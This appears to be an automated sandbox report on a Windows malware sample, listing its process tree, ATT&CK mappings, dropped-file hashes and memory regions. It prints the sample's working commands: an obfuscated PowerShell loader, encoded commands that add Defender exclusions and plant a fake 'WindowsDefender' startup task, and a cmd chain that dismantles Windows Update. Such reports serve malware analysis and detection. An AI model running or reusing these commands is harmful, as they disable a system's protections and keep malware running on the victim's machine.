C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4676

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1048

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1092

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1208

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1232

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1864

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3020

C:\Users\Admin\AppData\Local\Temp\3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
"C:\Users\Admin\AppData\Local\Temp\3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAaQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABsAGMAegAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBkAHoAeAAjAD4AIABAACgAIAA8ACMAZABvAGQAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGYAcABrACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGMAZgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGIAZwAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:3476

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:2956

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1904

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:4896

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:5080

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:3784

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:3516

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4816

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:3948

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:4560

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:4592

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4640

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4472

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4508

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:416

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:992

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1540

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:288

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:308

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:2140

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:584

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1860

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:2652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:3488

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4912

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AYwBlAGoAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAUABsAGEAdABmAG8AcgBtAFwARABlAGYAZQBuAGQAZQByAFwAdQBwAGQAYQB0AGUALgBlAHgAZQAiACcAKQAgADwAIwByAGcAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAG8AIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBoAGIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAYgBpAHQAIwA+ADsA"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:4684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:3980

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4972

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:3628

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3872

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3872 -s 788
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:3908

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3680 -s 856
2⤵
- Program crash
PID:4932

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2628

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2604

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2588

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2576

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2464

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2404

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2180

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1568

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2032

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1480

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1284

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4348

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF32F.tmp.csv
Filesize
30KB

MD5
4d350cf3a6cfc637a756654f76860ba0

SHA1
9b021350056bef079ae9cd67a039a68e807bbb80

SHA256
fb3446847a57838e4c94a63fd25e1bc7d2a80b44fe8d98cc3469fec67e4627bd

SHA512
761bd2acd942e01d1db5963cb1a57921aa2deade3682afe81c1a9b598fc3cf7fca7716dbfc8e8dfe546a2af8be649caa61f3fe0bff15e6a7b6bc80801efa0382

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF35E.tmp.csv
Filesize
30KB

MD5
d3a69d76c7d393834370590a5a432b9c

SHA1
c8234c3e790ff4f05f984441157642ff094a683c

SHA256
6a0da631c730f9278f4bf47e78c67895eb7173dbca95286ddfbc8a22673b5a98

SHA512
d1a0b6fdb1c4960f0f6db49cc1572ae45fa3a821ddc9b8a0454c9e14d9b894e880276082635de63889d118e76f1e407f4cd97f7db418465b4fd74ba7f784ec91

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF36F.tmp.txt
Filesize
12KB

MD5
53301c2459fa4275bdde2bcb4cb41979

SHA1
e7263d3a1570b4cdad6d22c0d838b20a88127e2b

SHA256
fa0ad95d98e1658c0784fd72b7e1961f31db778027f9ab5140b03f89f0fd6370

SHA512
3c42b3269d6a3a856f5faa737a348093e75c4d3e0b7f3809f936d82e865fa380d06963ad174a0e4d7a1584e2a223c6f38ac8859881cc6cc51fe192b439bc09b7

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3AF.tmp.txt
Filesize
12KB

MD5
c5394cd4137e8a3623fbc9a268b0fd1e

SHA1
d318ea3d91ddf8661415c815195398395732239d

SHA256
7f79c9f7ca17ca890937e811e0bf9347ec8c72d5d7abb704d468da619f39bf13

SHA512
ce1585cae7e85e36875360c07401cf2e227d975b8b739e22710a25583c56c819a045564fe85318e52db591c6b1360cfe566827cee09ba71c739878caf050e9f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8e5d9b10005af35b61b2d9c841b8eeb8

SHA1
5023d5d055aee16c4162307ac8eeaa821e1e88b9

SHA256
78a56bb571f33c807b22a17e294208db3932eb4dc60c9f4a6b390a7919be4008

SHA512
b17b6247d2dbec923966ee4c499efff704cb203b9f3fca70d7b180b20d958211b71a6502f7899b4f1b9ffd74f4bf29e15369bc8c6a2bcce71d98fe673c9b2b64

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
3KB

MD5
e546b81f1a1a1b753a4f6d3455394dec

SHA1
14f407db119dd97ed248be2a8d15a09ba938987a

SHA256
1100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8

SHA512
03f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe

Download Submit
\Users\Admin\AppData\Roaming\AB96.tmp
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/288-256-0x0000000000000000-mapping.dmp

Download
memory/308-262-0x0000000000000000-mapping.dmp

Download
memory/348-374-0x00000234A2930000-0x00000234A295A000-memory.dmp

Filesize
168KB

Download
memory/412-378-0x000001FF52270000-0x000001FF5229A000-memory.dmp

Filesize
168KB

Download
memory/416-225-0x0000000000000000-mapping.dmp

Download
memory/556-310-0x00007FF871D50000-0x00007FF871D60000-memory.dmp

Filesize
64KB

Download
memory/556-316-0x0000023417D70000-0x0000023417D93000-memory.dmp

Filesize
140KB

Download
memory/556-361-0x0000023417DA0000-0x0000023417DCA000-memory.dmp

Filesize
168KB

Download
memory/584-275-0x0000000000000000-mapping.dmp

Download
memory/632-311-0x00007FF871D50000-0x00007FF871D60000-memory.dmp

Filesize
64KB

Download
memory/632-363-0x000001D771E30000-0x000001D771E5A000-memory.dmp

Filesize
168KB

Download
memory/732-369-0x000001AE31420000-0x000001AE3144A000-memory.dmp

Filesize
168KB

Download
memory/896-371-0x00000290D5640000-0x00000290D566A000-memory.dmp

Filesize
168KB

Download
memory/912-472-0x00000000004039E0-mapping.dmp

Download
memory/948-380-0x0000019152230000-0x000001915225A000-memory.dmp

Filesize
168KB

Download
memory/972-313-0x00007FF871D50000-0x00007FF871D60000-memory.dmp

Filesize
64KB

Download
memory/972-365-0x0000026145490000-0x00000261454BA000-memory.dmp

Filesize
168KB

Download
memory/992-239-0x0000000000000000-mapping.dmp

Download
memory/1048-382-0x00000237EBE30000-0x00000237EBE5A000-memory.dmp

Filesize
168KB

Download
memory/1092-387-0x00000210A4EC0000-0x00000210A4EEA000-memory.dmp

Filesize
168KB

Download
memory/1164-384-0x000001AE8CD50000-0x000001AE8CD7A000-memory.dmp

Filesize
168KB

Download
memory/1208-388-0x0000019ADD7D0000-0x0000019ADD7FA000-memory.dmp

Filesize
168KB

Download
memory/1232-390-0x0000027D97BA0000-0x0000027D97BCA000-memory.dmp

Filesize
168KB

Download
memory/1244-392-0x000001F3E75C0000-0x000001F3E75EA000-memory.dmp

Filesize
168KB

Download
memory/1284-393-0x000001CB40AB0000-0x000001CB40ADA000-memory.dmp

Filesize
168KB

Download
memory/1300-159-0x0000000000000000-mapping.dmp

Download
memory/1392-394-0x00000231F6C00000-0x00000231F6C2A000-memory.dmp

Filesize
168KB

Download
memory/1420-395-0x000001EF39290000-0x000001EF392BA000-memory.dmp

Filesize
168KB

Download
memory/1480-397-0x0000027EEBD70000-0x0000027EEBD9A000-memory.dmp

Filesize
168KB

Download
memory/1488-400-0x0000020B136C0000-0x0000020B136EA000-memory.dmp

Filesize
168KB

Download
memory/1496-403-0x000002515C3D0000-0x000002515C3FA000-memory.dmp

Filesize
168KB

Download
memory/1524-406-0x0000017025410000-0x000001702543A000-memory.dmp

Filesize
168KB

Download
memory/1540-244-0x0000000000000000-mapping.dmp

Download
memory/1568-417-0x000002D01E1A0000-0x000002D01E1CA000-memory.dmp

Filesize
168KB

Download
memory/1616-409-0x000001B2B3890000-0x000001B2B38BA000-memory.dmp

Filesize
168KB

Download
memory/1692-410-0x000002BE87CC0000-0x000002BE87CEA000-memory.dmp

Filesize
168KB

Download
memory/1756-412-0x000001A566010000-0x000001A56603A000-memory.dmp

Filesize
168KB

Download
memory/1768-413-0x000001B31F800000-0x000001B31F82A000-memory.dmp

Filesize
168KB

Download
memory/1780-217-0x0000000000000000-mapping.dmp

Download
memory/1844-414-0x000001CD64230000-0x000001CD6425A000-memory.dmp

Filesize
168KB

Download
memory/1860-280-0x0000000000000000-mapping.dmp

Download
memory/1864-415-0x000001B31CAD0000-0x000001B31CAFA000-memory.dmp

Filesize
168KB

Download
memory/1904-161-0x0000000000000000-mapping.dmp

Download
memory/2032-416-0x00000000019C0000-0x00000000019EA000-memory.dmp

Filesize
168KB

Download
memory/2140-266-0x0000000000000000-mapping.dmp

Download
memory/2180-418-0x0000026124E40000-0x0000026124E6A000-memory.dmp

Filesize
168KB

Download
memory/2340-419-0x0000028C81910000-0x0000028C8193A000-memory.dmp

Filesize
168KB

Download
memory/2356-420-0x00000295E11B0000-0x00000295E11DA000-memory.dmp

Filesize
168KB

Download
memory/2404-421-0x0000017C48960000-0x0000017C4898A000-memory.dmp

Filesize
168KB

Download
memory/2416-422-0x000001AD99350000-0x000001AD9937A000-memory.dmp

Filesize
168KB

Download
memory/2464-423-0x0000015CC1030000-0x0000015CC105A000-memory.dmp

Filesize
168KB

Download
memory/2548-424-0x000001B21BFC0000-0x000001B21BFEA000-memory.dmp

Filesize
168KB

Download
memory/2576-425-0x0000027532B30000-0x0000027532B5A000-memory.dmp

Filesize
168KB

Download
memory/2588-426-0x0000022518580000-0x00000225185AA000-memory.dmp

Filesize
168KB

Download
memory/2596-427-0x00000201A5A30000-0x00000201A5A5A000-memory.dmp

Filesize
168KB

Download
memory/2604-428-0x0000016912710000-0x000001691273A000-memory.dmp

Filesize
168KB

Download
memory/2628-429-0x0000020D6A580000-0x0000020D6A5AA000-memory.dmp

Filesize
168KB

Download
memory/2652-284-0x0000000000000000-mapping.dmp

Download
memory/2708-118-0x0000000000F00000-0x0000000000F06000-memory.dmp

Filesize
24KB

Download
memory/2708-115-0x0000000000420000-0x00000000006F2000-memory.dmp

Filesize
2.8MB

Download
memory/2708-116-0x0000000000EF0000-0x0000000000EF6000-memory.dmp

Filesize
24KB

Download
memory/2708-117-0x000000001CDB0000-0x000000001D06C000-memory.dmp

Filesize
2.7MB

Download
memory/2708-207-0x000000001DAA0000-0x000000001DAB2000-memory.dmp

Filesize
72KB

Download
memory/2708-209-0x0000000180000000-0x0000000180023000-memory.dmp

Filesize
140KB

Download
memory/2708-208-0x000000001DAC0000-0x000000001DACA000-memory.dmp

Filesize
40KB

Download
memory/2956-158-0x0000000000000000-mapping.dmp

Download
memory/3020-314-0x00007FF871D50000-0x00007FF871D60000-memory.dmp

Filesize
64KB

Download
memory/3020-368-0x00000000006A0000-0x00000000006CA000-memory.dmp

Filesize
168KB

Download
memory/3476-156-0x0000000000000000-mapping.dmp

Download
memory/3488-157-0x0000000000000000-mapping.dmp

Download
memory/3516-177-0x0000000000000000-mapping.dmp

Download
memory/3700-216-0x00007FF685A01844-mapping.dmp

Download
memory/3744-292-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/3744-309-0x00007FF8B1CC0000-0x00007FF8B1E9B000-memory.dmp

Filesize
1.9MB

Download
memory/3744-297-0x00007FF8B1AC0000-0x00007FF8B1B6E000-memory.dmp

Filesize
696KB

Download
memory/3744-296-0x00007FF8B1CC0000-0x00007FF8B1E9B000-memory.dmp

Filesize
1.9MB

Download
memory/3744-295-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/3744-294-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/3744-293-0x00000001400033F4-mapping.dmp

Download
memory/3744-307-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/3784-175-0x0000000000000000-mapping.dmp

Download
memory/3908-405-0x000002351FD70000-0x000002351FD9A000-memory.dmp

Filesize
168KB

Download
memory/3908-408-0x000002351FE10000-0x000002351FE3A000-memory.dmp

Filesize
168KB

Download
memory/3908-376-0x0000000000000000-mapping.dmp

Download
memory/3948-183-0x0000000000000000-mapping.dmp

Download
memory/4296-186-0x0000000000000000-mapping.dmp

Download
memory/4304-160-0x0000000000000000-mapping.dmp

Download
memory/4472-219-0x0000000000000000-mapping.dmp

Download
memory/4488-168-0x0000000000000000-mapping.dmp

Download
memory/4508-221-0x0000000000000000-mapping.dmp

Download
memory/4532-230-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/4532-237-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/4532-306-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/4532-304-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
